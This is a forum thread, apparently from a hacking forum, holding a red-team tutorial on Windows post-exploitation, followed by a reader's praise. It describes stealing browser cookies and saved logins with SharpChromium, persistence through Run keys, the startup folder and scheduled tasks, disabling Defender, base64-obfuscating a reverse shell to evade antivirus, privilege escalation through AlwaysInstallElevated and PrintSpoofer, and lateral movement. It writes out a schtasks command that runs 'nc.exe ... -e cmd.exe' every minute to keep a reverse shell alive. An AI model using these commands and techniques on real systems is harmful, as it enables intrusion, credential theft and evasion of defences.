Pentest Red Team Infrastucture

[dEEpEst]

SharpChromium​

SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

• 
  Cookies (in JSON format)
• 
  History (with associated cookies for each history item)
• 
  Saved Logins

A small demonstration of saved credentials for the Edge Web Browser, these can be extracted with user-level permissions

(Heads up!!!, The credentials can be stored even if incorrect!!!)

 

[dEEpEst]

Persistence​

As MITRE defines

The adversary is trying to maintain its foothold.

In this section, I will demonstrate a few userland persistent methods and administrator methods to keep a foothold on the target environment

 

[dEEpEst]

Userland Persistence​

These methods are only achievable by user-level permissions the operator wouldn't have access to anything that requires administrator privileges, but some techniques can be achieved as a user

There are 2 categories of registry keys the SYSTEM and USER keys the user has access to edit the user keys and modify them as the user would like to but some that are to be mentioned are the Run and RunOnce keys, they are helpful since they would run when a user logs out or restarts the machine.

An example of this technique using cmd is as follows this will execute a binary, but you can as well add a command to get executed instead of a binary on disk

reg add HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run /v 1 /d "C:\Windows\System32\calc.exe"

We can verify this key created in the Registry

Once added successfully the user once login back to the workstation by locking or restarting the binary should be executed

Demo:

The startup up folder is a folder that contains programs that will initiate at boot time once a user has logged onto their session, this is another great method for user persistence as the user has written permissions in their startup folder.

A simple bat file left on the user's startup folder will execute once the user logs back in

Demo:

This link is hidden for visitors. Please Log in or register now.

Utilities such as schtasks can be used to schedule programs or scripts to be executed at a date and time specified by the user. Operators can use this feature to have code execution or binaries executed at a certain time of day to receive their persistent shell on the workstation

schtasks /create /sc minute /mo 1 /tn "Taxes" /tr C:\Windows\System32\calc.exe

Demo:

Scheduled Task​

Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system.

An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct a remote Execution as part of Lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

Let's create a task that keep a reverse shell alive every minute.

schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe'

As we can see here creating a task can be done with a simple syntax and I demonstrated with nc.exe binary which takes also arguments!, all that was needed is to be inside the double-quotes ("") and it will take arguments with spaces.These tasks can also be created remotely. All that is needed is the user to be an administrator or have proper permissions on the Remote machine.

In the schtasks help menu we see the arguments needed after /create to create a task on a remote server. We can supply the username and password on the arguments to authenticate and create the task.

It would look something like this.

schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password [If password is not supplied it will prompt asking for one]

 

[dEEpEst]

Elevated Persistence​

These methods are achieved once the operator has elevated its persistence on the workstation, this is helpful to avoid the privilege escalation situation and just come back to a higher permissions shell.

Note: These will require Privilege Escalation beforehand to achieve this level of persistence

Services

Services may be created with Administrator privileges, but they are executed under the SYSTEM level privileges, services can also be started through Service Execution.

A demonstration of the level required to create a Service can be shown below

But once elevated to the Administrator level

Our service has been successfully created and it's currently stopped will proceed to start the service

Even when the service lags or executes with an error it is still run successfully this usually happens when you replace the beneath with a command instead of a binary

All methods of persistence are available at this level of access on the workstation, I just wanted to demonstrate a specific one that can be demonstrated easily when Administrator access is needed.

 

[dEEpEst]

Defense Evasion​

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

A few techniques will be demonstrated in the following sections, they might not be OPSEC considered but they are available

 

[dEEpEst]

Disable or Modify Tools​

Attackers with the elevated permissions can disable security tools to avoid detection and activities that are being monitored

We can verify Defender is blocking our malicious attempts

We can disable defender utilizing PowerShell, Services, or even GPO Policies, an example is shown below:

Then after Disabling

Note: Something to notice is that Tamper protection blocks this action, ways to block this are via GPO or Registry Keys

Then after disabling any malicious attempts are able to be executed

 

[dEEpEst]

Obfuscating Files​

The action of obfuscating files is to make something obscure, unclear, or unintelligible. An example of simple obfuscation is a method of converting our strings into a base64 encoded format, this is no method of encryption, and this will not break the functionality of our code, but it is a way to hide our malicious payloads from AVs on scanning for malicious strings (AVs are smart and can also deobfuscate simple b64 and scan the real string)

I will work with a simple Reverse Shell PowerShell Script from Nishang

Saving the file, immediately flagged it

A little trick I've noticed, this technique is not new, but Defender flags a lot of malicious words in English, what if we change this to Spanish?

Now let's encode the entire script into Base64, PowerShell takes a specific format of base64, so we need to set up these settings to apply it to all the text on the script

We can copy and paste this base64 blob and run it correctly

Demo:

 

[dEEpEst]

Privilege Escalation​

In this section, I will demonstrate some tools and techniques that can be used for elevating your privileges on a workstation some are very well known and these make it simple and automated to find these misconfigurations in an environment that can allow us as operators to elevate our context to a higher one such as an Administrator

 

[dEEpEst]

PowerUp​

PowerUp has been out for a while a great PowerShell script that looks for your typical out of place configurations that can allow a regular user access to resources that they shouldn't this tool has not been updated in a while, especially the PowerShell script version one but we can utilize the C# one which Is actively maintained

Running is straightforward in its help menu we want to use all checks available and get the results from that the audit parameter is the one we use; we wait for it to finish, and we can see it has found a vulnerable configuration

To take advantage of this method we see that 2 registry keys are enabled that allow us to install MSI packages with elevated permissions, we are mostly interested in the User Key since we should be in this context.

We can create a simple payload utilizing msfvenom to create an MSI package or a visual studio to create our custom one.

To take advantage of this method we drop our MSI payload to the workstation utilize msiexec LOLBAS and gain a shell with elevated permissions

Here is a small demo of this technique

Demo:

 

[dEEpEst]

PrivescCheck​

PrivescCheck is an amazing PowerShell Script that looks for multiple vulnerable configurations, cleartext credentials, and missing patches for exploitation that can allow the operator to elevate privileges on the workstation, it is currently only in C#, but it is actively maintained and well worked on.

In this example, I will demonstrate the SeimpersonatePrivilege with this the user is allowed to impersonate a user or account and act on behalf of the user.

Running PrivescCheck will demonstrate this permission as True

More info

This link is hidden for visitors. Please Log in or register now.

TL;DR

The PrintSpoofer abuses the permissions to create a pipe and has the local system try and authenticate to impersonate its token.

A demonstration of exploiting this permission

 

[dEEpEst]

Lateral Movement​

Lateral movement is when our Operator will try to jump from one workstation to another, in this section Situational Awareness plays a big role, if our operator cannot locate workstations or find the correct services, configurations, or applications running in the environment we won't be able to figure out the next logical or stealthier way to blend with our environment when moving from one box to another. A few techniques demonstrating this step will be demonstrated

 

[dEEpEst]

RDP​

Remote Desktop Protocol is a GUI interface that Microsoft has built for users when trying to access a remote workstation usually running on Port 3389, this is great for employees working in remote locations trying to access the network environment.

Usually, to jump around workstations utilizing the RDP protocol a user must have special permissions to remote onto another box with the current user's permissions, on the other hand, Administrators of a Domain (Domain Admins) Or local Administrators of the box can RDP.

The following demonstration will show the use of RDP has Lateral Movement

Attacker Box RDPs into the user’s workstation

Our enumeration says that the HelpDesk user has permission to RDP onto the Desktop-Bravo workstation from the Desktop-Alpha workstation, we will enter the credentials from the user

And we will successfully have moved from Alpha to Bravo via RDP

 

[dEEpEst]

PowerShell Remoting​

Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers.

When having access to the internal network PowerShell has a CMDLET that allows to check for PS Remote availability on a Remote Host

If outside the network the usual port for this connection would be 5985, this can be edited to avoid attackers to find common ports open

Now form outside the network would be an amazing tool named evil-winrm that can allow us to take advantage of this protocol

Internal access will allow us to connect to a different workstation, we can use various methods to authenticate but I used the approach of running as a different user with the runas command, and the user can simply access the PSSession of the remote workstation as seen below

 

[kawaxi]

wow... it does not goo into the deep but it is outstanding work.... I can really find things that took me a lot to figure out..... outstanding work again. Im impress to find this knowledge on a forum, wish I could had found this forum a few years back.